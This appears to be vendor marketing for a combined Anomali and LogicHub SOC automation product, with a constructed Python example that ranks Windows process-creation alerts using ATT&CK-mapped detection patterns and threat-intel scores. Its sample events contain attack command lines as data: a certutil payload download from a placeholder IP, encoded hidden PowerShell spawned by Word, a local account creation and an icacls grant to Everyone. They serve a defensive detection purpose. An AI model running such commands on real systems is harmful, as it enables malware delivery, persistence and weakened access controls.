Maximizing Your SOC Efficiency and Effectiveness
Automate Threat Detection and Incident Response with Anomali and LogicHub
Anomali and LogicHub Joint Solution Features
- Automate Alert and Phishing Triage
Investigate and threat-rank every alert by automating complex investigation playbooks quickly and easily, and automate analysis and decision making by applying deep correlation and data-science operators
- Automate Incident Response
Contain, mitigate, and respond with confidence by creating automations quickly and easily, ensuring that investigations are thorough and that evidence is documented and catalogued consistently
- Automate Threat Detection and Hunting
Identify unknown threats in real time and gain deeper visibility into new threats by automating the expertise of a skilled analyst to hunt for them
- Reduce alert false positives by 95% and reduce MTTR by 10x using advanced analytics and machine learning
- Interactive case management prioritizes the critical events
- Integration with Anomali and your other tools is seamless, rapid, and production-grade
Security Automation Meets the Threat Intelligence Platform
The LogicHub SOAR+ platform delivers autonomous detection and response, advanced analytics, and machine learning to automate decision making with extreme accuracy. LogicHub can automatically submit investigation artifacts, such as a URL or IP address, directly to Anomali. Anomali returns a risk score for that artifact, and LogicHub correlates that score with a range of other factors to produce a high-quality ranking of scored alerts. With LogicHub SOAR+, these threat reports can be incorporated into threat detection playbooks based on Anomali threat intelligence and the MITRE ATT&CK™ framework, a globally accessible knowledge base of adversary tactics and techniques.
- Automate the process of intelligent decision making
- Fast, scalable implementation on-premises and in the cloud
- Focus on the truly critical incidents
Threat Detection for Windows Process Creation Events
Windows processes are a critical challenge for security analysts and Security Operations Centers (SOCs). Attackers are on the move: creating or deleting files, changing file permissions, downloading malware, creating accounts, and performing other nefarious activities. These activities are logged, but combing through these enormous log files for indications of attack is time-consuming, and time is something SOC teams never have enough of.
The LogicHub Threat Detection Playbook for Windows Process Creation Events applies automated analysis and advanced decision-making technology to identify suspicious and malicious events with the accuracy of an experienced threat hunting team. LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques, mapped them to the MITRE ATT&CK™ framework, and enriches them using the Anomali Threat Intelligence Platform (TIP).
It typically takes a security team months or longer, and a great deal of work, to build reliable and relevant threat detection content. The LogicHub Windows Events Creation playbook provides advanced analysis capabilities, machine-learning classification, and pattern matching built from libraries of hundreds of known attacks, ready to deploy in your environment. This content will hone your threat detection activities while reducing the time required for triage analysis.
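As an added illustration of the flow described in the two sections above (pattern-matched detection on Windows process creation events mapped to MITRE ATT&CK technique IDs, with an artifact risk score from the threat-intelligence platform folded into the alert ranking), the following Python example is included here. It is not LogicHub or Anomali code: the sample events, the detection patterns and their weights, the `TI_RISK_SCORES` table standing in for the Anomali lookup, the `lookup_risk_score` helper, and the scoring formula are all constructed for this example.

```python
"""Rank Windows process-creation alerts by combining ATT&CK-mapped detection
patterns with a threat-intel risk score. Constructed example, not vendor code."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Pattern:
    name: str
    technique: str      # MITRE ATT&CK technique ID the pattern is mapped to
    weight: int         # contribution to the alert score when the pattern hits
    cmd_regex: str      # matched against the command line
    parent_regex: str = ".*"  # matched against the parent process path


# Constructed detection patterns (hypothetical weights; a real playbook library
# would be far larger and tuned against the environment).
PATTERNS = [
    Pattern("encoded-powershell", "T1059.001", 40,
            r"powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\s"),
    Pattern("office-spawns-shell", "T1204.002", 50,
            r"(cmd|powershell|wscript|cscript|mshta)(\.exe)?",
            r"(winword|excel|outlook|powerpnt)\.exe$"),
    Pattern("local-account-created", "T1136.001", 30,
            r"\bnet(1)?(\.exe)?\s+user\s+\S+\s+\S+\s+/add"),
    Pattern("certutil-download", "T1105", 35,
            r"certutil(\.exe)?\s.*-urlcache"),
    Pattern("acl-weakened", "T1222.001", 25,
            r"icacls(\.exe)?\s.*/grant\s+everyone:"),
]

# URLs and IPv4 addresses are the artifacts we would submit to the TIP.
IOC_RE = re.compile(r"(https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}\b)", re.I)

# Stand-in for the threat-intelligence platform: a constructed table of risk
# scores (0-100) keyed by artifact. A real integration would call the TIP here.
TI_RISK_SCORES = {
    "http://203.0.113.7/p.txt": 90,
    "198.51.100.23": 60,
}


def lookup_risk_score(artifact):
    """Hypothetical TIP lookup; unknown artifacts score 0."""
    return TI_RISK_SCORES.get(artifact, 0)


def extract_artifacts(command_line):
    return sorted(set(IOC_RE.findall(command_line)))


def score_event(event):
    """Apply every pattern, enrich extracted artifacts, and combine into one score."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentProcessName", "")
    hits = [p for p in PATTERNS
            if re.search(p.cmd_regex, cmd, re.I) and re.search(p.parent_regex, parent, re.I)]
    pattern_score = sum(p.weight for p in hits)
    artifacts = extract_artifacts(cmd)
    ti_score = max((lookup_risk_score(a) for a in artifacts), default=0)
    # Detection evidence drives the ranking; the TI score lifts it further (capped at 100).
    total = min(100, pattern_score + ti_score // 2)
    return {
        "computer": event.get("Computer"),
        "user": event.get("SubjectUserName"),
        "process": event.get("NewProcessName"),
        "patterns": [p.name for p in hits],
        "techniques": sorted({p.technique for p in hits}),
        "artifacts": artifacts,
        "ti_score": ti_score,
        "score": total,
    }


def rank_alerts(events, threshold=25):
    """Drop low-scoring events and return the rest, highest score first."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold),
                  key=lambda s: s["score"], reverse=True)


# Constructed sample events shaped like Windows Security event 4688 fields.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe report.txt",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},
    {"EventID": 4688, "Computer": "WS02", "SubjectUserName": "bob",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
     "ParentProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
    {"EventID": 4688, "Computer": "WS03", "SubjectUserName": "carol",
     "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.7/p.txt C:\\Users\\Public\\p.exe",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4688, "Computer": "SRV01", "SubjectUserName": "dave",
     "NewProcessName": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "net user backup_svc P@ssw0rd! /add",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4688, "Computer": "WS04", "SubjectUserName": "erin",
     "NewProcessName": "C:\\Windows\\System32\\PING.EXE",
     "CommandLine": "ping -n 1 198.51.100.23",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4688, "Computer": "SRV02", "SubjectUserName": "frank",
     "NewProcessName": "C:\\Windows\\System32\\icacls.exe",
     "CommandLine": "icacls C:\\Data\\Finance /grant Everyone:F /T",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},
]

if __name__ == "__main__":
    for alert in rank_alerts(SAMPLE_EVENTS):
        print(alert["score"], alert["computer"], alert["techniques"], alert["artifacts"])
```

The ranking puts the Office-spawned encoded PowerShell first (two pattern hits), then the certutil download, whose single pattern hit is lifted by the high TIP score on its URL; the benign notepad launch never reaches the threshold. The ping event shows the other direction of the correlation: no pattern matched, yet the TIP score on the destination address alone is enough to surface it for review.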
Phishing Alert Triage
When phishing attacks work, they can be devastating. Instead of proactively investigating threats, analysts spend hours per day sorting through emails forwarded to a special inbox or collected in a quarantined folder for review. Even when security analysts do an excellent job discerning phishing attacks from innocent email, there’s usually no way for them to capture that expertise in a way that can be shared, automatically applied, and built on in the future.
LogicHub Phishing Triage is a security automation solution for the triage of reported phishing emails. Powered by Machine Learning (ML), LogicHub Phishing Triage rapidly and accurately analyzes emails and classifies them according to a SOC’s email threat categories, such as malicious, safe, or needs further review. An intuitive interface lets security analysts quickly review results and kick off response workflows with a click. In typical customer scenarios, LogicHub achieves 97% accuracy and reduces the number of phishing alerts requiring human analysis by 75% or more.
- Dramatic reduction in the time required for analyzing suspicious emails, enabling analysts to spend more time on proactive threat-hunting and other strategic activities
- ML-powered analysis that only becomes more accurate over time, applying results from analyzing real-life phishing scenarios
- Integration with other security tools for implementing automated workflows and responses
- Acceleration of responses to phishing threats, reducing the risk of data breaches and other types of security attacks